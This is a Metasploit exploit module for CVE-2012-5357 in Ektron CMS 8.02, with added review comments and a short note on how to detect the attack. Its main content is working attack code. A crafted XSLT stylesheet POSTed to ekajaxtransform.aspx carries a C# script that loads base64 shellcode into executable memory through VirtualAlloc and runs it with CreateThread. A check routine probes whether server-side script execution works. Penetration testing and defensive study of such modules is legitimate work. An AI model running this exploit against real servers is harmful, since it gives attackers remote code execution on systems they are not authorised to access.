Path: blob/master/modules/exploits/windows/http/ektron_xslt_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Ektron CMS 8.02 XSLT transform remote code execution (CVE-2012-5357).
#
# Both #check and #exploit POST to WorkArea/ContentDesigner/ekajaxtransform.aspx
# with a caller-supplied 'xslt' form field. Per the description, the server
# applies that stylesheet with XslCompiledTransform, and the <msxsl:script>
# block embedded in it is compiled and run server side. #check only sends a
# script that echoes a random marker string; #exploit sends one that launches
# the generated payload. Defensively, a POST to that endpoint whose 'xslt'
# field carries an msxsl:script block is the request shape to alert on, and
# the description names SP5 as the fixed level.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  # Module metadata and datastore options.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Ektron 8.02 XSLT Transform Remote Code Execution',
      'Description'    => %q{
        This module exploits a vulnerability in Ektron CMS 8.02 (before SP5). The
        vulnerability exists due to the insecure usage of XslCompiledTransform, using a
        XSLT controlled by the user. The module has been tested successfully on Ektron CMS
        8.02 over Windows 2003 SP2, which allows to execute arbitrary code with NETWORK
        SERVICE privileges.
      },
      'Author'         => [
        'Rich Lundeen', # Vulnerability discovery
        'juan vazquez', # Metasploit module
        'Nicolas "Nicob" Gregoire' # C# code using VirtualAlloc + copy shellcode + CreateThread
      ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2012-5357'],
          [ 'OSVDB', '88107' ],
          [ 'URL', 'http://webstersprodigy.net/2012/10/25/cve-2012-5357cve-1012-5358-cool-ektron-xslt-rce-bugs/' ],
          [ 'URL', 'http://technet.microsoft.com/en-us/security/msvr/msvr12-016' ]
        ],
      'Payload'        =>
        {
          'Space' => 2048,
          'StackAdjustment' => -3500
        },
      'Platform'       => 'win',
      # NOTE(review): 'Privileged' => true, while the description says the code
      # runs as NETWORK SERVICE; which of the two is intended is not visible here.
      'Privileged'     => true,
      'Targets'        =>
        [
          ['Windows 2003 SP2 / Ektron CMS400 8.02', { }],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2012-10-16'
    ))

    register_options(
      [
        # NOTE(review): HTTP_DELAY is registered but never read anywhere in this
        # module, and its description (an HTTP server waiting for a VBS payload)
        # does not match anything the module does; it looks copied from another
        # module and could be dropped.
        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the VBS payload request', 60]),
        OptString.new('TARGETURI', [true, 'The URI path of the Ektron CMS', '/cms400min/'])
      ])
  end

  # Vulnerability check.
  #
  # Sends a stylesheet whose only script function returns a random marker and
  # reports Vulnerable when the marker comes back in a 200 response that does
  # not contain "Error"; anything else (no response, other status, marker
  # missing) is reported as Safe. The script that runs server side here only
  # returns a string, so the probe still exercises script execution, but with
  # no further side effect.
  def check

    # Marker is alphabetic only, so interpolating it into the regexp below
    # cannot introduce regexp metacharacters.
    fingerprint = rand_text_alpha(5 + rand(5))
    # Heredoc body is kept at column 0: leading whitespace before the
    # <?xml ...?> declaration is not valid XML and would be sent verbatim.
    xslt_data = <<-XSLT
<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">
<msxsl:script language="C#" implements-prefix="user">
<![CDATA[
public string xml()
{
return "#{fingerprint}";
}
]]>
</msxsl:script>
<xsl:template match="/">
<xsl:value-of select="user:xml()"/>
</xsl:template>
</xsl:stylesheet>
    XSLT

    res = send_request_cgi(
      {
        'uri' => "#{uri_path}WorkArea/ContentDesigner/ekajaxtransform.aspx",
        'version' => '1.1',
        'method' => 'POST',
        'ctype' => "application/x-www-form-urlencoded; charset=UTF-8",
        'headers' => {
          "Referer" => build_referer
        },
        'vars_post' => {
          # The 'xml' document is random filler; only the stylesheet matters.
          "xml" => rand_text_alpha(5 + rand(5)),
          "xslt" => xslt_data
        }
      })

    if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

  # TARGETURI path normalised to end with a single "/", so it can be
  # concatenated directly with the ekajaxtransform.aspx relative path.
  def uri_path
    uri_path = target_uri.path
    # NOTE(review): `<<` appends in place to the String returned by
    # target_uri.path rather than to a copy; harmless if that object is fresh
    # on every call, but worth confirming against target_uri's implementation.
    uri_path << "/" if uri_path[-1, 1] != "/"
    uri_path
  end

  # Referer header value: scheme (from the SSL option), RHOST, RPORT and the
  # normalised TARGETURI path. Sent on both the check and exploit requests.
  def build_referer
    if datastore['SSL']
      schema = "https://"
    else
      schema = "http://"
    end

    referer = schema
    referer << rhost
    referer << ":#{rport}"
    referer << uri_path
    referer
  end

  # Exploit entry point.
  #
  # Builds the same stylesheet shape as #check, but the C# function here
  # decodes the base64 payload, copies it into memory obtained from
  # VirtualAlloc with PAGE_EXECUTE_READWRITE, and starts it with CreateThread
  # before returning the marker. Success is reported on the same condition as
  # #check (200, marker present, no "Error"); otherwise fail_with is raised.
  def exploit

    print_status("Generating the EXE Payload and the XSLT...")
    fingerprint = rand_text_alpha(5 + rand(5))

    # NOTE(review): inside the script, the return value of VirtualAlloc is not
    # checked and hThread is assigned but never inspected, so the marker is
    # returned even when allocation or thread creation fails; print_good below
    # therefore only proves that the script ran, not that the payload started.
    # Heredoc body at column 0 for the same XML-declaration reason as in #check.
    xslt_data = <<-XSLT
<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">
<msxsl:script language="C#" implements-prefix="user">
<![CDATA[

private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);

[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);

public string xml()
{
string shellcode64 = @"#{Rex::Text.encode_base64(payload.encoded)}";
byte[] shellcode = System.Convert.FromBase64String(shellcode64);
UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
System.Runtime.InteropServices.Marshal.Copy(shellcode , 0, (IntPtr)(funcAddr), shellcode .Length);
IntPtr hThread = IntPtr.Zero;
IntPtr pinfo = IntPtr.Zero;
UInt32 threadId = 0;
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
return "#{fingerprint}";
}
]]>
</msxsl:script>
<xsl:template match="/">
<xsl:value-of select="user:xml()"/>
</xsl:template>
</xsl:stylesheet>
    XSLT

    print_status("Trying to run the xslt transformation...")
    # Same endpoint, headers and form fields as #check; only the stylesheet differs.
    res = send_request_cgi(
      {
        'uri' => "#{uri_path}WorkArea/ContentDesigner/ekajaxtransform.aspx",
        'version' => '1.1',
        'method' => 'POST',
        'ctype' => "application/x-www-form-urlencoded; charset=UTF-8",
        'headers' => {
          "Referer" => build_referer
        },
        'vars_post' => {
          "xml" => rand_text_alpha(5 + rand(5)),
          "xslt" => xslt_data
        }
      })
    if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/
      print_good("Exploitation was successful")
    else
      fail_with(Failure::Unknown, "There was an unexpected response to the xslt transformation request")
    end

  end
end